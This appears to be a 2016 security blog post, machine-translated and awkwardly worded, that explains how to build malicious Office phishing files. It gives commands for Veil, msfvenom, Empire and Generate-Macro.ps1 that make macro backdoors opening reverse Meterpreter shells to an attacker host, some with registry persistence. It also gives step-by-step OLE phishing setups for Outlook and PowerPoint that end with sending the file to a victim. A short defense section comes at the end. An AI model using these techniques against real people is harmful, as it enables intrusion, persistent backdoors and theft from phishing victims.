Evi1cg · 2016/03/03 at 10:30

As a very popular Office software under Windows platform, more and more APT attacks are carried out by constructing malicious Office files, which is also an attack method with high success rate. Of course, the most subtle and effective way to attack the Office suite is through some 0days, but there are also some disadvantages. Firstly, not everyone has 0days, and those xdays that have been published may only be for certain fixed versions of Office, so this article does not focus on using Xday. Instead, it summarizes some known ways and methods of constructing Office Phishing File, hoping to be helpful to students learning Hack. Of course, it also hopes that through this article, friends can avoid such attacks.

The following tests are in the installation of a security guard Win10 above.

0 x00 Office macros

---

Macro is a Microsoft OFFICE software package design for its special function, software designers in order to let people in the use of software to work, to avoid repeating the same action again and again and designed a kind of tool, which USES a simple syntax, write macros, commonly used action when at work, can be directly used to cover a good macro to run automatically, To complete a specific task without having to repeat the same action is intended to automate some of the tasks in user documentation. Mwi-5: The use of Office macros to download keyloggers attack activity analysis, below will introduce several well-known tools to build macro backdoors.

1, the Veil

Test powershell/shellcode_inject/virtual, select directly generate

Type a name and generate:

Then you need to download a conversion script:

#! Bash ☁ office git clone https://github.com/khr0x40sh/MacroShop.gitCopy the code

Convert to VBA using the downloaded Python script:

#! bash[email protected]:~/script/MacroShop# python macro_safe.py /usr/share/veil-output/source/test.bat
Copy the code

Then add the generated content to the OFFice file macro. To create a macro, select the position of the macro as the current document:

Next select the Microsoft Word object under Project, select Document-> Open, and paste in the generated code. The code to save is shown below

One thing to note here is that the script generates a macro that opens the table by default, so only the function content is there, so check it.

Then save it as a Word or doc document with macros enabled.

Enable listening:

#! bash[email protected]:~/Veil-Evasion# msfconsole -r /usr/share/veil-output/handlers/test_handler.rc
Copy the code

Opening a Word document will prompt you:

Click Enable to generate a Meterpreter session.

2、 Nishang

The use of Nishang is described in the powerShell Client for effective fishing.

3、 Metasploit

As an artifact, Msf can also generate VBA backdoor files with the following command:

#! Bash ☁ ~ msfvenom - p Windows/meterpreter/reverse_tcp lhost = 192.168.2.100 lport = 8888 - e x86 / shikata_ga_nai exitfunc=thread -f vba > vcode.txtCopy the code

4、 Empire

#! bash (Empire) > listeners [!]  No listeners currently active (Empire: listeners) > execute (Empire: listeners) > usestager macro (Empire: stager/macro) > set Listener test (Empire: stager/macro) > set OutFile /tmp/macro.txt (Empire: stager/macro) > execute [*] Stager output written out to: /tmp/macro.txtCopy the code

Write code to macro, execute successfully return session:

5, and Scripts

#! Bash ☁ office git clone https://github.com/enigma0x3/Generate-Macro.gitCopy the code

The usage is as follows:

#! powershell PS C:\Users\Evi1cg\Desktop> . .\Generate-Macro.ps1 Enter URL of Invoke-Shellcode script (If you use GitHub, use the raw version): https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-Shellcode.ps1 Enter IP Address: 192.168.2.111 Enter Port Number: 6666 Enter the name of the document (Do not include a file extension): Macro --------Select Attack--------- 1. Meterpreter Shell with Logon Persistence 2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin) 3. Meterpreter Shell with Alternate Data Stream Persistence 4. Meterpreter Shell with Scheduled Task Persistence ------------------------------ Select Attack Number & Press Enter: 1 --------Select Payload--------- 1. Meterpreter Reverse HTTPS 2. Meterpreter Reverse HTTP ------------------------------ Select Payload Number & Press Enter: 2 Saved to file C:\Users\Evi1cg\Desktop\Macro.xls Clean-up Script located at C:\Users\Evi1cg\Desktop\RegistryCleanup.ps1Copy the code

Running Excel generates a Meterpreter session:

At the same time generate a self-starting backdoor:

The key value is HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load

To clear the rear door, run the following command:

#! powershell PS C:\Users\Evi1cg\Desktop> . .\RegistryCleanup.ps1 [*]Successfully Removed config.vbs from C:\Users\Public [*]Successfully Removed Malicious Load entry from HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows [!] Path not valid [!] Path not validCopy the code

Specific use of other back door, interested partners but their own practice.

Other Macro backdoor scripts are as follows:

• Old-Powershell-payload-Excel-Delivery
• OutlookPersistence
• exe2vba.rb
• unicorn

0x01 Office OLE

---

OLE is the abbreviation of Object Linking and Embedding, which is a technology to embed part of a file into another file. This kind of attack is also often applied in APT. One advantage of OLE is that users do not need to open macros. And execute commands with macros disabled.

1, the Outlook OLE

@Three good students in the Zone before there had a introduction: Outlook OLE phishing email use introduction, I in Win10 +offcie2016 under the test, here to do a simple introduction, make this phishing file steps are as follows:

1. Create a new message and select RTF in the text formatting area:

   

2. Select Insert -> Object ->Package and select Display as icon:

   

3. Then change the icon to Word icon and modify the caption to confusing name:

   

4. Binding specifies a program or script;

5. Change RTF to HTML again;

6. Add other confusing content:

   

7. Save as test.msg;

8. Send it to the victim.

The following prompt will be displayed after the victim runs:

Click yes to play later:

Click open and execute successfully:

2、 PowerPoint OLE

Phishing with a PowerPoint presentation, again without enabling macros, is done as follows:

1. Create a new PowerPoint file;

2. Create VBS script, for simple demonstration, just write a popbox:

   #! vb Msgbox("test")Copy the code

3. Drag VBS into PPT;

4. Animate VBS ->OLE action and select Activate as shown below:

   

5. Select the Animation pane -> Effects Options:

   

6. Select timing -> same time as previous animation:

   

7. Add content to PPT;

8. Save as projection file PPS or PPSX;

9. Send it to the victim.

The following prompt box will be displayed when the victim is opened:

Click open to execute the script.

For VBS backdoor, this article will not describe in detail how to make, many postures friends can collect, more fun please refer to :JavaScript Phishing

For VBS scripts, you can use this script to encrypt them: ncode-and-decode a-vb

0 x02 defense

---

Attacks on Office macros or OLE objects have been around since the 1990s, but are still being exploited today. How do you better defend against such attacks?

1. You can teach your employees not to enable macros, not to click ok, not to download unknown files, etc.

2. Configure group policies. In a domain, you can configure management templates in batches.

   

   Set Disable all except Digitally signed Macros:

   

   See here for more details

3. Pay special attention to files with.msg,.rtf, and.pps suffixes;

4. Using EMET, if you don’t know what EMET is, you can look here.

The above method comes from IT-S-time-to-secure-Microsoft-Office. For security Settings about planning VBA macros for Office, see here.

0 x03 summary

---

There are more and more APT attacks using Office. In the case of no 0day, we should at least understand and guard against the above types of phishing attacks. The above ways of constructing Office phishing files that we know about may not be comprehensive.

0 x04 reference

---

• Phishme.com/powerpoint-…
• Zone.wooyun.org/content/246…
• https:[email protected][email protected]-point-n-click-gui-37f4cbc107d0#.92vne7zgd
• www.youtube.com/watch?v=xm4…
• www.youtube.com/watch?v=j0C…

This article was originally published by EVI1CG and first published by Black Cloud Drops